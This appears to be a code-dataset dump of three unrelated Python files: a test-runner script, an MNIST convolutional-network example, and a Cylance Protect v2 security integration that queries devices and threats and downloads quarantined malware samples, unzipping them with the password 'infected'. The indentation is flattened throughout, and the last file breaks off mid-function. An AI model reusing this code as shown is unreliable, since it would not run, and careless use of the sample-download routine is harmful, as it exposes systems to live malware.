sys.path.append(os.path.dirname(__file__))
def exit_on_failure(ret, message=None):
if ret:
sys.exit(ret)
def flake8_main(args):
print('Running flake8 code linting')
ret = subprocess.call(['flake8'] + args)
print('flake8 failed' if ret else 'flake8 passed')
return ret
def split_class_and_function(string):
class_string, function_string = string.split('.', 1)
return "%s and %s" % (class_string, function_string)
def is_function(string):
# `True` if it looks like a test function is included in the string.
return string.startswith('test_') or '.test_' in string
def is_class(string):
# `True` if first character is uppercase - assume it's a class name.
return string[0] == string[0].upper()
if __name__ == "__main__":
try:
sys.argv.remove('--nolint')
except ValueError:
run_flake8 = True
else:
run_flake8 = False
try:
sys.argv.remove('--lintonly')
except ValueError:
run_tests = True
else:
run_tests = False
try:
sys.argv.remove('--fast')
except ValueError:
style = 'default'
else:
style = 'fast'
run_flake8 = False
if len(sys.argv) > 1:
pytest_args = sys.argv[1:]
first_arg = pytest_args[0]
if first_arg.startswith('-'):
# `runtests.py [flags]`
pytest_args = ['tests'] + pytest_args
elif is_class(first_arg) and is_function(first_arg):
# `runtests.py TestCase.test_function [flags]`
expression = split_class_and_function(first_arg)
pytest_args = ['tests', '-k', expression] + pytest_args[1:]
elif is_class(first_arg) or is_function(first_arg):
# `runtests.py TestCase [flags]`
# `runtests.py test_function [flags]`
pytest_args = ['tests', '-k', pytest_args[0]] + pytest_args[1:]
else:
pytest_args = PYTEST_ARGS[style]
if run_tests:
exit_on_failure(pytest.main(pytest_args))
if run_flake8:
exit_on_failure(flake8_main(FLAKE8_ARGS))
| apache-2.0 | -7,299,852,809,777,010,000 | 25.615385 | 96 | 0.592073 | false |
trenton3983/Artificial_Intelligence_for_Humans | vol3/vol3-python-examples/examples/example_mnist_conv.py | 1 | 2549 | #!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 3: Deep Learning and Neural Networks
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2015 by Jeff Heaton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
"""
import lasagne
from lib.aifh.mnist import *
import theano
import theano.tensor as T
import time
import types
from lasagne.layers import DenseLayer
from lasagne.layers import InputLayer
from lasagne.nonlinearities import sigmoid
from lasagne.nonlinearities import softmax
from lasagne.nonlinearities import rectify
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet
from lasagne.layers import Conv2DLayer
layers0 = [('input', InputLayer),
('conv0', Conv2DLayer),
('dense0', DenseLayer),
('output', DenseLayer)]
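# A small convolutional network: 28x28 grayscale input, one 5x5 convolution
# with 32 filters, a 1000-unit rectified dense layer, and a 10-way softmax output.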
net0 = NeuralNet(layers=layers0,
input_shape=(None, 1, 28, 28),
conv0_num_filters=32,
conv0_filter_size=(5, 5),
conv0_nonlinearity=lasagne.nonlinearities.rectify,
dense0_num_units=1000,
dense0_nonlinearity = rectify,
output_num_units=10,
output_nonlinearity=softmax,
update=nesterov_momentum,
update_learning_rate=0.1,
update_momentum=0.9,
regression=False,
on_epoch_finished=[
EarlyStopping(patience=5)
],
verbose=1,
max_epochs=100)
X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(True)
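# Override nolearn's internal train/validation split so training uses the
# pre-made MNIST validation set loaded above.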
def my_split(self, X, y, eval_size):
return X_train,X_val,y_train,y_val
net0.train_test_split = types.MethodType(my_split, net0)
net0.fit(X_train, y_train)
y_predict = net0.predict(X_val)
count = 0
wrong = 0
for element in zip(X_val,y_val,y_predict):
if element[1] != element[2]:
wrong = wrong + 1
count = count + 1
print("Incorrect {}/{} ({}%)".format(wrong,count,(wrong/count)*100))
| apache-2.0 | -293,695,254,517,834,240 | 28.988235 | 76 | 0.708513 | false |
demisto/content | Packs/Cylance_Protect/Integrations/Cylance_Protect_v2/Cylance_Protect_v2.py | 1 | 50344 | from CommonServerPython import *
import jwt
import uuid
import requests
import json
import re
import zipfile
from StringIO import StringIO
from datetime import datetime, timedelta
# disable insecure warnings
requests.packages.urllib3.disable_warnings()
# CONSTANTS
TOKEN_TIMEOUT = 300 # 5 minutes
URI_AUTH = 'auth/v2/token'
URI_DEVICES = 'devices/v2'
URI_POLICIES = 'policies/v2'
URI_ZONES = 'zones/v2'
URI_THREATS = 'threats/v2'
URI_LISTS = 'globallists/v2'
SCOPE_DEVICE_LIST = 'device:list'
SCOPE_DEVICE_READ = 'device:read'
SCOPE_DEVICE_UPDATE = 'device:update'
SCOPE_DEVICE_THREAT_LIST = 'device:threatlist'
SCOPE_POLICY_LIST = 'policy:list'
SCOPE_POLICY_READ = 'policy:read'
SCOPE_ZONE_CREATE = 'zone:create'
SCOPE_ZONE_LIST = 'zone:list'
SCOPE_ZONE_READ = 'zone:read'
SCOPE_ZONE_UPDATE = 'zone:update'
SCOPE_THREAT_READ = 'threat:read'
SCOPE_THREAT_DEVICE_LIST = 'threat:devicelist'
SCOPE_THREAT_UPDATE = 'threat:update'
SCOPE_GLOBAL_LIST = 'globallist:list'
SCOPE_THREAT_LIST = 'threat:list'
SCOPE_GLOBAL_LIST_CREATE = 'globallist:create'
SCOPE_GLOBAL_LIST_DELETE = 'globallist:delete'
# PREREQUISITES
def load_server_url():
""" Cleans and loads the server url from the configuration """
url = demisto.params()['server']
    url = re.sub(r'/+$', '', url)  # strip any trailing slashes
return url
# GLOBALS
APP_ID = demisto.params()['app_id']
APP_SECRET = demisto.params()['app_secret']
TID = demisto.params()['tid']
SERVER_URL = load_server_url()
FILE_THRESHOLD = demisto.params()['file_threshold']
USE_SSL = not demisto.params().get('unsecure', False)
# HELPERS
def generate_jwt_times():
"""
Generates the epoch time window in which the token will be valid
Returns the current timestamp and the timeout timestamp (in that order)
"""
now = datetime.utcnow()
timeout_datetime = now + timedelta(seconds=TOKEN_TIMEOUT)
epoch_time = int((now - datetime(1970, 1, 1)).total_seconds())
epoch_timeout = int((timeout_datetime - datetime(1970, 1, 1)).total_seconds())
return epoch_time, epoch_timeout
def api_call(uri, method='post', headers={}, body={}, params={}, accept_404=False):
"""
Makes an API call to the server URL with the supplied uri, method, headers, body and params
"""
url = '%s/%s' % (SERVER_URL, uri)
res = requests.request(method, url, headers=headers, data=json.dumps(body), params=params, verify=USE_SSL)
if res.status_code < 200 or res.status_code >= 300:
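        # A 409 for a hash that is already on the global list is raised as a
        # Warning rather than reported via return_error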
if res.status_code == 409 and str(res.content).find('already an entry for this threat') != -1:
raise Warning(res.content)
if not res.status_code == 404 and not accept_404:
return_error(
'Got status code ' + str(res.status_code) + ' with body ' + res.content + ' with headers ' + str(
res.headers))
return json.loads(res.text) if res.text else res.ok
def get_authentication_token(scope=None):
"""
Generates a JWT authorization token with an optional scope and queries the API for an access token
Returns the received API access token
"""
# Generate token ID
token_id = str(uuid.uuid4())
# Generate current time & token timeout
epoch_time, epoch_timeout = generate_jwt_times()
# Token claims
claims = {
'exp': epoch_timeout,
'iat': epoch_time,
'iss': 'http://cylance.com',
'sub': APP_ID,
'tid': TID,
'jti': token_id
}
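    # Optionally restrict the token to a single scope (e.g. device:list)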
if scope:
claims['scp'] = scope
# Encode the token
encoded = jwt.encode(claims, APP_SECRET, algorithm='HS256')
payload = {'auth_token': encoded}
headers = {'Content-Type': 'application/json; charset=utf-8'}
res = api_call(method='post', uri=URI_AUTH, body=payload, headers=headers)
return res['access_token']
def threat_to_incident(threat):
incident = {
'name': 'Cylance Protect v2 threat ' + threat['name'],
'occurred': threat['last_found'] + 'Z',
'rawJSON': json.dumps(threat)
}
host_name = None
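    # Look up the devices affected by this threat and use the device whose
    # detection time matches the threat's last_found as the incident host name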
devices = get_threat_devices_request(threat['sha256'], None, None)['page_items']
for device in devices:
if device['date_found'] == threat['last_found']:
host_name = device['name']
labels = [{'type': 'Classification', 'value': threat['classification']}, {'type': 'MD5', 'value': threat['md5']},
{'type': 'SHA256', 'value': threat['sha256']}, {'type': 'ThreatLastFound', 'value': threat['last_found']},
{'type': 'HostName', 'value': host_name}]
incident['labels'] = labels
return incident
def normalize_score(score):
"""
Translates API raw float (-1 to 1) score to UI score (-100 to 100)
"""
return score * 100
def translate_score(score, threshold):
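    # Map the normalized Cylance score (-100..100) to a DBot score:
    # positive scores are good (1), scores between the threshold and 0 are
    # suspicious (2), and scores below the threshold are bad (3)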
if score > 0:
dbot_score = 1
elif threshold <= score:
dbot_score = 2
else:
dbot_score = 3
return dbot_score
# FUNCTIONS
def test():
access_token = get_authentication_token()
if not access_token:
raise Exception('Unable to get access token')
demisto.results('ok')
def get_devices():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
result = get_devices_request(page, page_size)
devices = result['page_items']
hr = []
devices_context = []
endpoint_context = []
for device in devices:
current_device_context = {
'AgentVersion': device['agent_version'],
'DateFirstRegistered': device['date_first_registered'],
'ID': device['id'],
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['name'],
'State': device['state']
}
if device['policy']:
policy = {}
if device['policy']['id']:
policy['ID'] = device['policy']['id']
if device['policy']['name']:
policy['Name'] = device['policy']['name']
if policy:
current_device_context['Policy'] = policy
devices_context.append(current_device_context)
endpoint_context.append({
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['name']
})
current_device = dict(device)
current_device['ip_addresses'] = ', '.join(current_device['ip_addresses'])
current_device['mac_addresses'] = ', '.join(current_device['mac_addresses'])
current_device['policy'] = current_device['policy']['name']
hr.append(current_device)
ec = {
'CylanceProtect.Device(val.ID && val.ID === obj.ID)': devices_context,
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context
}
entry = {
'Type': entryTypes['note'],
'Contents': devices,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown('Cylance Protect Devices', hr, headerTransform=underscoreToCamelCase,
removeNull=True),
'EntryContext': ec
}
demisto.results(entry)
def get_devices_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_DEVICES, method='get', headers=headers, params=params)
return res
def get_device():
device_id = demisto.args()['id']
device = get_device_request(device_id)
hr = []
if device:
device_context = {
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['host_name'],
'OSVersion': device['os_version'],
'UpdateAvailable': device['update_available'],
'BackgroundDetection': device['background_detection'],
'DateFirstRegistered': device['date_first_registered'],
'DateLastModified': device['date_last_modified'],
'DateOffline': device['date_offline'],
'IsSafe': device['is_safe'],
'LastLoggedInUser': device['last_logged_in_user'],
'State': device['state'],
'ID': device['id'],
'Name': device['name']
}
if device['update_type']:
device_context['UpdateType'] = device['update_type']
if device['policy']:
policy = {}
if device['policy']['id']:
policy['ID'] = device['policy']['id']
if device['policy']['name']:
policy['Name'] = device['policy']['name']
if policy:
device_context['Policy'] = policy
endpoint_context = {
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['host_name'],
'OSVersion': device['os_version']
}
ec = {
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context,
'CylanceProtect.Device(val.ID && val.ID === obj.ID)': device_context
}
current_device = dict(device)
current_device['ip_addresses'] = ', '.join(current_device['ip_addresses'])
current_device['mac_addresses'] = ', '.join(current_device['mac_addresses'])
current_device['policy'] = current_device['policy']['name']
hr.append(current_device)
else:
ec = {}
title = 'Cylance Protect Device ' + device_id
entry = {
'Type': entryTypes['note'],
'Contents': device,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, hr, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
}
demisto.results(entry)
def get_device_request(device_id):
access_token = get_authentication_token(scope=SCOPE_DEVICE_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
def update_device():
device_id = demisto.args()['id']
name = demisto.args()['name'] if 'name' in demisto.args() else None
policy_id = demisto.args()['policyId'] if 'policyId' in demisto.args() else None
add_zones = demisto.args()['addZones'] if 'addZones' in demisto.args() else None
remove_zones = demisto.args()['removeZones'] if 'removeZones' in demisto.args() else None
update_device_request(device_id, name, policy_id, add_zones, remove_zones)
hr = {}
if name:
hr['Name'] = name
if policy_id:
hr['PolicyID'] = policy_id
if add_zones:
hr['AddedZones'] = add_zones
if remove_zones:
hr['RemovedZones'] = remove_zones
device = hr.copy()
device['id'] = device_id
title = 'Device ' + device_id + ' was updated successfully.'
entry = {
'Type': entryTypes['note'],
'Contents': device,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [hr])
}
demisto.results(entry)
def update_device_request(device_id, name=None, policy_id=None, add_zones=None, remove_zones=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {}
if name:
body['name'] = name
if policy_id:
body['policy_id'] = policy_id
if add_zones:
body['add_zone_ids'] = [add_zones]
if remove_zones:
body['remove_zone_ids'] = [remove_zones]
# Do we have anything to update?
if not body:
raise Exception('No changes detected')
uri = '%s/%s' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='put', headers=headers, body=body)
return res
def get_device_threats():
device_id = demisto.args()['id']
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
device_threats = get_device_threats_request(device_id, page, page_size)['page_items']
dbot_score_array = []
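    # Normalize each threat's Cylance score to the -100..100 range and
    # translate it to a DBot score against the configured file threshold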
for threat in device_threats:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat.get('sha256'),
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
if device_threats:
threats_context = createContext(data=device_threats, keyTransform=underscoreToCamelCase)
threats_context = add_capitalized_hash_to_context(threats_context)
ec = {
'File': threats_context,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Device Threat ' + device_id
demisto.results({
'Type': entryTypes['note'],
'Contents': device_threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, device_threats, headerTransform=underscoreToCamelCase),
'EntryContext': ec
})
else:
demisto.results('No threats found.')
def get_device_threats_request(device_id, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_THREAT_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
uri = '%s/%s/threats' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='get', headers=headers, params=params)
return res
def get_policies():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
policies = get_policies_request(page, page_size)['page_items']
context_policies = createContext(data=policies, keyTransform=underscoreToCamelCase)
ec = {
'CylanceProtect.Policies(val.id && val.id === obj.id)': context_policies
}
title = 'Cylance Protect Policies'
entry = {
'Type': entryTypes['note'],
'Contents': policies,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, policies, headerTransform=underscoreToCamelCase),
'EntryContext': ec
}
demisto.results(entry)
def get_policies_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_POLICY_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_POLICIES, method='get', headers=headers, params=params)
return res
def create_zone():
name = demisto.args()['name']
policy_id = demisto.args()['policy_id']
criticality = demisto.args()['criticality']
zone = create_zone_request(name, policy_id, criticality)
title = 'Zone ' + name + ' was created successfully.'
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [zone], headerTransform=underscoreToCamelCase)
})
def create_zone_request(name, policy_id, criticality):
access_token = get_authentication_token(scope=SCOPE_ZONE_CREATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'name': name,
'policy_id': policy_id,
'criticality': criticality
}
res = api_call(uri=URI_ZONES, method='post', headers=headers, body=body)
return res
def get_zones():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
zones = get_zones_request(page, page_size)['page_items']
context_zones = createContext(data=zones, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceProtect.Zones(val.Id && val.Id === obj.Id)': context_zones
}
title = 'Cylance Protect Zones'
demisto.results({
'Type': entryTypes['note'],
'Contents': zones,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, zones, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_zones_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_ZONE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_ZONES, method='get', headers=headers, params=params)
return res
def get_zone():
zone_id = demisto.args()['id']
zone = get_zone_request(zone_id)
context_zone = createContext(data=zone, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceProtect.Zones(val.Id && val.Id === obj.Id)': context_zone
}
title = 'Cylance Protect Zone ' + zone_id
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, zone, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_zone_request(zone_id):
access_token = get_authentication_token(scope=SCOPE_ZONE_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_ZONES, zone_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
def update_zone():
zone_id = demisto.args()['id']
# Get current zone and fill in requires missing arguments
current_zone = get_zone_request(zone_id)
# Details to update
name = demisto.args()['name'] if 'name' in demisto.args() else current_zone['name']
policy_id = demisto.args()['policy_id'] if 'policy_id' in demisto.args() else current_zone['policy_id']
criticality = demisto.args()['criticality'] if 'criticality' in demisto.args() else current_zone['criticality']
zone = update_zone_request(zone_id, name, policy_id, criticality)
hr = {}
if name:
hr['Name'] = name
if policy_id:
hr['PolicyID'] = policy_id
if criticality:
hr['Criticality'] = criticality
title = 'Zone was updated successfully.'
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [hr])
})
def update_zone_request(zone_id, name, policy_id, criticality):
access_token = get_authentication_token(scope=SCOPE_ZONE_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {}
if name:
body['name'] = name
if policy_id:
body['policy_id'] = policy_id
if criticality:
body['criticality'] = criticality
# Do we have anything to update?
if not body:
raise Exception('No changes detected')
uri = '%s/%s' % (URI_ZONES, zone_id)
res = api_call(uri=uri, method='put', headers=headers, body=body)
return res
def get_threat():
sha256 = demisto.args().get('sha256')
threat = get_threat_request(sha256)
if threat:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
context_threat = createContext(data=threat, keyTransform=underscoreToCamelCase, removeNull=True)
context_threat = add_capitalized_hash_to_context(context_threat)
ec = {
'File': context_threat,
'DBotScore': {
'Indicator': sha256,
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
}
}
title = 'Cylance Protect Threat ' + sha256
demisto.results({
'Type': entryTypes['note'],
'Contents': threat,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threat, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('Threat was not found.')
def get_threat_request(sha256):
access_token = get_authentication_token(scope=SCOPE_THREAT_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_THREATS, sha256)
res = api_call(uri=uri, method='get', headers=headers, body={}, params={}, accept_404=False)
return res
def get_threats():
page = demisto.args().get('pageNumber')
page_size = demisto.args().get('pageSize')
threats = get_threats_request(page, page_size)['page_items']
dbot_score_array = []
for threat in threats:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat.get('sha256'),
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
context_threat = createContext(data=threats, keyTransform=underscoreToCamelCase, removeNull=True)
context_threat = add_capitalized_hash_to_context(context_threat)
ec = {
'File': context_threat,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Threats'
demisto.results({
'Type': entryTypes['note'],
'Contents': threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threats, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_threats_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_THREAT_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
    if page:
        params['page'] = page
    if page_size:
        params['page_size'] = page_size
res = api_call(uri=URI_THREATS, method='get', headers=headers, params=params)
return res
def get_threat_devices():
threat_hash = demisto.args()['sha256']
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
threats = get_threat_devices_request(threat_hash, page, page_size)['page_items']
if threats:
threats_context = threats[:]
for threat in threats:
threat['ip_addresses'] = ', '.join(threat['ip_addresses'])
threat['mac_addresses'] = ', '.join(threat['mac_addresses'])
file_paths = []
endpoint_context = []
devices_context = []
for threat in threats_context:
endpoint_context.append({
'Hostname': threat['name'],
'IPAddress': threat['ip_addresses'],
'MACAddress': threat['mac_addresses']
})
current_device = {
'Hostname': threat['name'],
'IPAddress': threat['ip_addresses'],
'MACAddress': threat['mac_addresses'],
'AgentVersion': threat['agent_version'],
'DateFound': threat['date_found'],
'FilePath': threat['file_path'],
'ID': threat['id'],
'State': threat['state'],
'FileStatus': threat['file_status']
}
if threat['policy_id']:
current_device['PolicyID'] = threat['policy_id']
devices_context.append(current_device)
file_path = threat.pop('file_path')
file_paths.append({
'FilePath': file_path
})
file_context = {
'SHA256': threat_hash,
'Path': file_paths
}
ec = {
'File': file_context,
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context,
'CylanceProtect.Threat(val.SHA256 && val.SHA256 === obj.SHA256)': {
'SHA256': threat_hash,
'Devices': devices_context
}
}
title = 'Cylance Protect Threat ' + threat_hash + ' Devices'
demisto.results({
'Type': entryTypes['note'],
'Contents': threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threats, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('No devices found on given threat.')
def get_threat_devices_request(threat_hash, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_THREAT_DEVICE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
uri = '%s/%s/devices' % (URI_THREATS, threat_hash)
res = api_call(uri=uri, method='get', headers=headers, params=params)
return res
def get_list():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
lst = get_list_request(demisto.args()['listTypeId'], page, page_size)['page_items']
dbot_score_array = []
for threat in lst:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat['sha256'],
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
if lst:
context_list = createContext(data=lst, keyTransform=underscoreToCamelCase, removeNull=True)
context_list = add_capitalized_hash_to_context((context_list))
ec = {
'File': context_list,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Global List'
demisto.results({
'Type': entryTypes['note'],
'Contents': lst,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, lst, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('No list of this type was found.')
def get_list_request(list_type_id, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if list_type_id == 'GlobalQuarantine':
params['listTypeId'] = 0
else: # List Type ID is GlobalSafe
params['listTypeId'] = 1
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_LISTS, method='get', headers=headers, params=params)
return res
def get_list_entry_by_hash(sha256=None, list_type_id=None):
if not sha256:
sha256 = demisto.args()['sha256']
if not list_type_id:
list_type_id = demisto.args()['listTypeId']
total_pages = 0
current_page = 0
found_hash = None
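    # Page through the global list (200 entries per request) until the hash
    # is found or all pages have been scanned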
while not found_hash and total_pages >= current_page:
if not current_page:
current_page = 1
lst = get_list_request(list_type_id, current_page, 200)
if not total_pages:
total_pages = lst['total_pages']
for i in lst['page_items']:
if i['sha256'] == sha256:
found_hash = i
break
current_page += 1
if demisto.command() == 'cylance-protect-get-list-entry':
if found_hash:
context_list = createContext(data=found_hash, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceListSearch': context_list
}
title = 'Cylance Protect Global List Entry'
demisto.results({
'Type': entryTypes['note'],
'Contents': found_hash,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, found_hash, headerTransform=underscoreToCamelCase,
removeNull=True),
'EntryContext': ec
})
else:
demisto.results("Hash not found")
else:
return found_hash
def get_indicators_report():
url = 'https://protect.cylance.com/Reports/ThreatDataReportV1/indicators/' + demisto.args()['token']
res = requests.request('GET', url, verify=USE_SSL)
filename = 'Indicators_Report.csv'
demisto.results(fileResult(filename, res.content))
def update_device_threats():
device_id = demisto.args()['device_id']
threat_id = demisto.args()['threat_id']
event = demisto.args()['event']
update_device_threats_request(device_id, threat_id, event)
demisto.results('Device threat was updated successfully.')
def update_device_threats_request(device_id, threat_id, event):
access_token = get_authentication_token(scope=SCOPE_THREAT_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'threat_id': threat_id,
'event': event
}
uri = '%s/%s/threats' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='post', headers=headers, body=body)
return res
def download_threat():
contents = {}
context = {}
dbot_score = 0
sha256 = demisto.args()['sha256']
threat_url = download_threat_request(sha256)
threat_file = requests.get(threat_url, allow_redirects=True, verify=USE_SSL)
if threat_file.status_code == 200:
if demisto.args()['unzip'] == "yes":
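            # The download is a zip archive protected with the password
            # 'infected'; the archived member is named by the upper-cased SHA256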
file_archive = StringIO(threat_file.content)
zip_file = zipfile.ZipFile(file_archive)
file_data = zip_file.read(sha256.upper(), pwd='infected')
demisto.results(fileResult(sha256, file_data))
else:
            demisto.results(fileResult(sha256 + '.zip', threat_file.content))
else:
return_error('Could not fetch the file')
threat = get_threat_request(sha256)
if threat:
# add data about the threat if found
if threat.get('cylance_score'):
score = normalize_score(threat.get('cylance_score'))
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(score, int(threshold))
contents = {
'Download URL': threat_url,
'File Name': threat.get('name'),
'File Size': threat.get('file_size'),
'Detected By': threat.get('detected_by'),
'GlobalQuarantine': threat.get('global_quarantined'),
'Safelisted': threat.get('safelisted'),
'Timestamp': threat.get('cert_timestamp'),
}
context[outputPaths['file']] = {
'DownloadURL': threat_url,
'SHA256': threat.get('sha256'),
'Name': threat.get('name'),
'Size': threat.get('file_size'),
'Safelisted': threat.get('safelisted'),
'Timestamp': threat.get('cert_timestamp'),
'MD5': threat.get('md5')
}
if dbot_score == 3:
context[outputPaths['file']]['Malicious'] = {
'Vendor': 'Cylance Protect',
'Description': 'Score determined by get threat command'
}
context[outputPaths['dbotscore']] = {
'Indicator': threat.get('sha256'),
'Type': 'file',
